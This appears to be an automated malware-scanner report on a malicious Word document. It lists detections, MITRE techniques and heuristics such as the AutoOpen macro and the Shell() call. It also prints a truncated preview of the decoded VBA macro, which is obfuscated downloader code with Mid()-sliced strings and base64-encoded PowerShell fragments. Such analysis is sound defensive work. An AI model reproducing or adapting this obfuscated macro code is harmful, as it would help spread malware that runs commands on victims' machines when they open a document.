MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
This Office document contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes the Shell() function, indicating an attempt to run an external command. This strongly suggests the document is a downloader for a second-stage payload, though the specific payload and its destination are not directly evident from the provided script excerpt.
Heuristics 8
-
ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64105 bytes |
SHA-256: 0bb4c21df702c15d46b537f601181c90914c7350986ce181479e4aa068fc3341 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 118 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function YBPtiXzjZ() TrlXz = "Y1WqDzYfFRYjQdzVfHondvbWUEqDdYMmaauWrHzuQYwXRliLdVREnaYcDzVwIUChEmFpiadYKuXEzDFiVfZHGIwACSTrlwlvWPSijsdDrsutDTdzumcduuawnEnPGmmLIbhklaCdCWPNNFzioTzwVHBboV4330PWGRPM" RZiNjaw = Mid(TrlXz, 4, 151) cfNjaBwW = RZiNjaw JubzqsGXH = "SYQAFHKcVGYbjTjhtMLkTVwIvJzsFFpUICbDJrWMVqwbGpWzVbSSYSzwkXSjtbWQQEShsjYCqwOdZWCFmwXimXwpCcSlYmStUfLBXoHpCPbZDWZOVNwvErdsIciPNmdEfVItLAiwqhcXwWmjDEQLqXpcCStvKrcPmXtiNfDUfzEWPGwmqzMIVRNIffrsHmozFMkYdDTXBwjsSSNKB4" TdiliTquSGz = Mid(JubzqsGXH, 8, 200) viCzGkRzjm = TdiliTquSGz FKMjwnS = "4AR29XHP7XSCFRFV034UKbXpZJHiUVwvEdOVfcvbmITAlJQTsjBfzzkIbmzWFENlIfjLYUVzKUcbHXDQtollTQzFtGttcZWhuhrGZFuYNEVdWIAEjjcRTcSsiiSRacVkzujZfzqotNYPuUikGpJszFOSPzXvnczlilfbcaYmtoXFECzNvhLlScnsjOKfZuBQQmhJoGIfQXzIhIONCJAFRLSGwmvOQsNznHpRVnZpZfUuciLXzwGJED8G" hFKKOwzCFlO = Mid(FKMjwnS, 22, 221) iYYjRQEAm = hFKKOwzCFlO SosEOU = "QDH825H0IPC8OL23BUAEFIOAQZIXZPtIsilkIkJvrLkjlijitnlGFCuwMYpKmaIdJLECtSiuWEPACfspIdilinDpjnYkvwIRDHZZajlaFqkAnuwjfzBJvXwWIOSGuwwXvzzuFTPcsDjnDCCpqrEwzzVjJDQMNijGsNFqwBbMkZQsqKTGMdQCtCZvbRlCCDONWZvpwLsoQsMYidpwkKAkOdN9H2UTLR" TQYUMF = Mid(SosEOU, 27, 189) GSPfqziPPf = TQYUMF iVUjrI = "C2K7C1WBCUI1WILqlZAaakqfomScHQzwzPlmvWUFihNLTwqWBBtHuWjJzEmufENEUlbvoZuPEuvsXfLpwwaGXsDdfcmrkZaaTJqiWuicGdDzaqmUswwjdHhchwPMmDiiUVZNocTBNzAtpECopRwobrwMbNBYiWAY" UlTvfCY = Mid(iVUjrI, 15, 144) sQSkjC = UlTvfCY JzAaj = "KW4I1CBXK8KLrbFNwFGjkbmtOTkzbU7BWTWRPUF7ZJ2YSIH" YDpMEbmw = Mid(JzAaj, 13, 17) DBwHPPHfoW = YDpMEbmw dpCUM = "FZKEWZCN0U32AU8BQ7SpnJOfQYKjKCVQOdJAkbmBpBMwbmSrCdzsMFCnzNYrhfNfIYjGBzAmrLAlwQDiGSdjCcEJaWCWDvTKojqDDLqDdNBAFRqhJulPBjcfTajfwdjwspwQZAbucaDpaEDJQXKY7" GmmlB = Mid(dpCUM, 20, 124) zBwEJukMa = GmmlB DNbuoVwvF = "2DCG0D6QQW5KI2J5IDdPuvzEUaLBLtPYKAUaSzrPkKjlrXdTbXOTPwFsHlwubXifPwkcKlFCFNijPNMwzsaniwILucShAznMjAVumAIqSMOBTWcuYAwjzqATnYhiSXBHaSCPrSJzjjVShGsYzYIzAEOqzCHNSaYuKGbBTNCGrzzNUilhjIjtOBHWDLPpLviJLbHbfrFlVCIAEBVQQZhJrifJwFwHwNvvVqBtbKBpDzYMsHM" aKqAjzcTV = Mid(DNbuoVwvF, 19, 219) IEowDA = aKqAjzcTV HrhzkMYBXw = "0UH2KTY1EJC9J6JfVNJJEIIDKjcfLGzdFIQUaHITqmacnEPXWzbQamnjoMPRwORUDMVvnoFOEqSRifQFTFILijDSUjfOsrUQ3L" iqoIAziz = Mid(HrhzkMYBXw, 15, 81) BXCFOuVaaaN = iqoIAziz wbwkuKYunl = "TXLN6RQR7YizsjEaufQfHnBPVMiDEwRNUBmGbYWtscEJGAawZlTVowpqijjCqwrapVdrzwzVJWnijrIUmhdSfwZYLvXrsTDvldTlXjwblzLSJLGqbLQISYvtvEfBaHdpSrtFYXzCiCjhkHOAojQjDvcMiZpSDzAiTWzRRBSDONZQrNJoqfMuqzmXOjXwhfwlCCOOIzinONSpVMVUQBcYkFoWjbCldTWiOnOpzvjswZjdfzCCKDijDaBwNrfjuwKuqjahzjVUUjbKZAS7YYQBTYVGI1500W" uimtaCDIDLn = Mid(wbwkuKYunl, 11, 259) qEUmjJjnRzi = uimtaCDIDLn blfLhGja = "G2L4ZVIM8HRCpzYlOVShvwcZsznIHNfOzcpGYrGtFTQrovRwpKhAXUwdhcwGKQFfbDDNKRMWPZbbhllzfoSwffqiiLZvvzipOkPksEoYzKlwsWvwqzaVzIzwNYiwrRbPqmNzVAEbAuzUurmIQdFvZNsGkTXUVqjjjVIGJwapuzVDJiCVlaiNLfpdtGMCdkFKNSlYijzSDPBZrpzFQBivHSUDffMClXMKuLpqtdmFbPKwiQlEJGlbBJCuwhsDTwjfDqffzGMnPdUrBFYIG3" slGwfwAd = Mid(blfLhGja, 10, 259) ZnwMlw = slGwfwAd kEqljFlM = "P10UNWATYAH77UOXTU3PWTUX89R7MdQpzTjiMNAEbwijzBPUzvZHN8Y" pkBfNjEPo = Mid(kEqljFlM, 30, 23) StAuYJ = pkBfNjEPo nRijKRcH = "CG4LYfMjiHEbnpnqBaGvPjR9C767EP63IEO5L3A4PA" VRuOYmEwqLU = Mid(nRijKRcH, 5, 18) sZMmbrfmpMA = VRuOYmEwqLU End Function Function vVGFMiUuU() vuiOuq = "1190HIFZ3HKD2AsADEAMQA1AGIAOQA3AGsAMQAwADMAOwAxADAAMQA+ADUAOQAsADEAMgA1AGIAMQAyADUAJwAuAFMAcABsAEkAdAAoACcAawAsACUAdgBFAD4AOwBSADoAYgAnACkAfAAgAEYAbwBSAEUAQQBDAEgAIAB7ACAAKAAgAFsASQBuAHQAXQAkAF8AIAAtAEEAUwBbAEMAaABBAHIAXQApAH0AIAApACAALQBqAE8AaQBuACAAJ6DG" DAViawbF = Mid(vuiOuq, 14, 239) upCpRt = DAViawbF czALqhwdOr = "K7E6QV02LLREPCJQ1AMQAwADAAawA3ADAAOgAxADEANwBiADcAOABFADQANwBrADQANABiADEAMAA0AHYAMQAxADYALAAxADEANgA7ADEAMQAyAFIANQA4ADoANAA3AHYANAA3ADsAOQA3AEUAMQAwADgAdgAxADAAOAA6ADEAMQAxAD4AMQAwADMAJQAxADAAMwA+ADEAMAA1AEUANAA2ACwAMQAxADUAawAxADAAMQBSADQANwB2ADEAMAA1AD4ANAA3AGsANA ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.